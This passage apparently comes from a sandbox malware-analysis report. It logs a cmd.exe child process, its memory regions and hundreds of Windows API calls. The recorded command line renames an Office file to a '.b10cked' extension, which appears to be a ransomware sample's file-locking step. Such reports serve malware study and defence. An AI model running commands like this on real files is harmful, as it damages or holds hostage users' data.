out: hFindFile=0x372138) returned 1 [0173.072] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28e8c0 | out: _Buffer=" 1") returned 9 [0173.072] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.072] GetFileType (hFile=0x7) returned 0x2 [0173.096] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.096] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28e84c | out: lpMode=0x28e84c) returned 1 [0173.097] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.097] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28e880 | out: lpConsoleScreenBufferInfo=0x28e880) returned 1 [0173.097] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0173.097] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28e8c0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0173.097] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28e8a4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28e8a4*=0x1a) returned 1 [0173.098] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.098] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.098] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.098] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.098] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.098] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.098] SetConsoleInputExeNameW () returned 0x1 [0173.098] GetConsoleOutputCP () returned 0x1b5 [0173.098] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.098] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.099] exit (_Code=0) Process: id = "301" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e60" os_pid = "0x134" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23580 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23581 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23582 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23583 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 23584 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23585 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23586 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23587 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23588 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 23589 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23698 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23699 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23700 start_va = 0x50000 end_va = 0x5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 23701 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23702 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 23703 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23704 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23705 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23706 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23707 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23708 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23709 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23710 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23711 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23712 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 23713 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23714 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23715 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 23716 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 23717 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 23718 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 23719 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 23720 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 23721 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 400 os_tid = 0x740 [0173.461] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fd4c | out: lpSystemTimeAsFileTime=0x18fd4c*(dwLowDateTime=0x9d497a20, dwHighDateTime=0x1d440a9)) [0173.461] GetCurrentProcessId () returned 0x134 [0173.461] GetCurrentThreadId () returned 0x740 [0173.461] GetTickCount () returned 0x32809 [0173.461] QueryPerformanceCounter (in: lpPerformanceCount=0x18fd44 | out: lpPerformanceCount=0x18fd44*=23025033718) returned 1 [0173.462] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0173.462] __set_app_type (_Type=0x1) [0173.462] __p__fmode () returned 0x76b331f4 [0173.462] __p__commode () returned 0x76b331fc [0173.462] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0173.462] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0173.462] GetCurrentThreadId () returned 0x740 [0173.462] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x740) returned 0x38 [0173.463] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.463] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0173.463] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.463] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0173.463] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fcdc | out: phkResult=0x18fcdc*=0x0) returned 0x2 [0173.463] VirtualQuery (in: lpAddress=0x18fd13, lpBuffer=0x18fcac, dwLength=0x1c | out: lpBuffer=0x18fcac*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.463] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fcac, dwLength=0x1c | out: lpBuffer=0x18fcac*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0173.463] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fcac, dwLength=0x1c | out: lpBuffer=0x18fcac*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0173.463] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fcac, dwLength=0x1c | out: lpBuffer=0x18fcac*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.463] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fcac, dwLength=0x1c | out: lpBuffer=0x18fcac*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0173.463] GetConsoleOutputCP () returned 0x1b5 [0173.463] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.463] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0173.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.464] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0173.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.464] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.464] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.464] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.464] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.464] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.464] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0173.465] GetEnvironmentStringsW () returned 0x360218* [0173.465] FreeEnvironmentStringsW (penv=0x360218) returned 1 [0173.465] GetEnvironmentStringsW () returned 0x360218* [0173.465] FreeEnvironmentStringsW (penv=0x360218) returned 1 [0173.465] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ec4c | out: phkResult=0x18ec4c*=0x40) returned 0x0 [0173.465] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x0, lpData=0x18ec58*=0xa8, lpcbData=0x18ec50*=0x1000) returned 0x2 [0173.465] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x4, lpData=0x18ec58*=0x1, lpcbData=0x18ec50*=0x4) returned 0x0 [0173.465] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x0, lpData=0x18ec58*=0x1, lpcbData=0x18ec50*=0x1000) returned 0x2 [0173.465] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x4, lpData=0x18ec58*=0x0, lpcbData=0x18ec50*=0x4) returned 0x0 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x4, lpData=0x18ec58*=0x40, lpcbData=0x18ec50*=0x4) returned 0x0 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x4, lpData=0x18ec58*=0x40, lpcbData=0x18ec50*=0x4) returned 0x0 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x0, lpData=0x18ec58*=0x40, lpcbData=0x18ec50*=0x1000) returned 0x2 [0173.466] RegCloseKey (hKey=0x40) returned 0x0 [0173.466] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ec4c | out: phkResult=0x18ec4c*=0x40) returned 0x0 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x0, lpData=0x18ec58*=0x40, lpcbData=0x18ec50*=0x1000) returned 0x2 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x4, lpData=0x18ec58*=0x1, lpcbData=0x18ec50*=0x4) returned 0x0 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x0, lpData=0x18ec58*=0x1, lpcbData=0x18ec50*=0x1000) returned 0x2 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x4, lpData=0x18ec58*=0x0, lpcbData=0x18ec50*=0x4) returned 0x0 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x4, lpData=0x18ec58*=0x9, lpcbData=0x18ec50*=0x4) returned 0x0 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x4, lpData=0x18ec58*=0x9, lpcbData=0x18ec50*=0x4) returned 0x0 [0173.466] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec58, lpcbData=0x18ec50*=0x1000 | out: lpType=0x18ec54*=0x0, lpData=0x18ec58*=0x9, lpcbData=0x18ec50*=0x1000) returned 0x2 [0173.466] RegCloseKey (hKey=0x40) returned 0x0 [0173.466] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886389 [0173.466] srand (_Seed=0x5b886389) [0173.466] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked\"" [0173.466] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked\"" [0173.467] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.467] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x361978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0173.467] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0173.467] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0173.467] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.467] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0173.467] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0173.467] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0173.467] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0173.467] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0173.467] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0173.467] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0173.467] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0173.467] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0173.468] GetEnvironmentStringsW () returned 0x362368* [0173.468] FreeEnvironmentStringsW (penv=0x362368) returned 1 [0173.468] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.468] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.468] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0173.468] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0173.468] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0173.468] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0173.468] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0173.468] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0173.468] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0173.468] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0173.468] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fa18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.468] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fa18, lpFilePart=0x18fa14 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fa14*="Desktop") returned 0x18 [0173.468] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.468] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f794 | out: lpFindFileData=0x18f794) returned 0x3609f8 [0173.468] FindClose (in: hFindFile=0x3609f8 | out: hFindFile=0x3609f8) returned 1 [0173.469] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f794 | out: lpFindFileData=0x18f794) returned 0x3609f8 [0173.469] FindClose (in: hFindFile=0x3609f8 | out: hFindFile=0x3609f8) returned 1 [0173.469] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f794 | out: lpFindFileData=0x18f794) returned 0x3609f8 [0173.469] FindClose (in: hFindFile=0x3609f8 | out: hFindFile=0x3609f8) returned 1 [0173.469] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.469] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0173.469] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0173.469] GetEnvironmentStringsW () returned 0x360218* [0173.469] FreeEnvironmentStringsW (penv=0x360218) returned 1 [0173.469] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.470] GetConsoleOutputCP () returned 0x1b5 [0173.470] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.470] GetUserDefaultLCID () returned 0x409 [0173.470] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0173.470] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fb58, cchData=128 | out: lpLCData="0") returned 2 [0173.470] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fb58, cchData=128 | out: lpLCData="0") returned 2 [0173.470] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fb58, cchData=128 | out: lpLCData="1") returned 2 [0173.470] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0173.470] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0173.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0173.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0173.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0173.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0173.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0173.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0173.471] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0173.471] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0173.471] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0173.472] GetConsoleTitleW (in: lpConsoleTitle=0x350938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.472] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.472] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0173.472] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0173.472] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0173.473] _wcsicmp (_String1="move", _String2=")") returned 68 [0173.473] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0173.473] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0173.473] _wcsicmp (_String1="IF", _String2="move") returned -4 [0173.473] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0173.473] _wcsicmp (_String1="REM", _String2="move") returned 5 [0173.473] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0173.476] GetConsoleTitleW (in: lpConsoleTitle=0x18f850, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.476] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0173.476] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0173.476] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0173.476] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0173.476] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0173.476] _wcsicmp (_String1="move", _String2="CD") returned 10 [0173.476] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0173.476] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0173.476] _wcsicmp (_String1="move", _String2="REN") returned -5 [0173.476] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0173.476] _wcsicmp (_String1="move", _String2="SET") returned -6 [0173.476] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0173.477] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0173.477] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0173.477] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0173.477] _wcsicmp (_String1="move", _String2="MD") returned 11 [0173.477] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0173.477] _wcsicmp (_String1="move", _String2="RD") returned -5 [0173.477] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0173.477] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0173.477] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0173.477] 